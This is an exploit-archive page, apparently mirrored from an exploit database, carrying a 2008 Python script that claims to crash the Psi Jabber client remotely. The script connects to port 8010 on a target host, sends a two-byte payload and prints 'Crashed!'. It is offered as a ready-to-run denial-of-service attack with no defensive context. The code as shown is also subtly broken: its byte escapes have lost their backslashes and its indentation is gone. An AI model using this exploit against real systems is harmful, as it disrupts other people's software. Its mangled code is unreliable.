[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)
# Published : 2008-12-23
# Author : Sha0
# Previous Title : Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit
# Next Title : PGP Desktop 9.0.6 (PGPwded.sys) Local Denial of Service Exploit
#!/usr/bin/python
#psi jabber client 8010/tcp remote denial of service (win & lin)
#by sha0[at]badchecksum.net
#http://jolmos.blogspot.com
import socket, sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((sys.argv[1],8010))
except:
print 'Cannot connect!'
sys.exit(1)
try:
sock.send('x05xff')
print 'Crashed!'
except:
print 'Cannot send!'
sock.close()
# www.Syue.com [2008-12-23]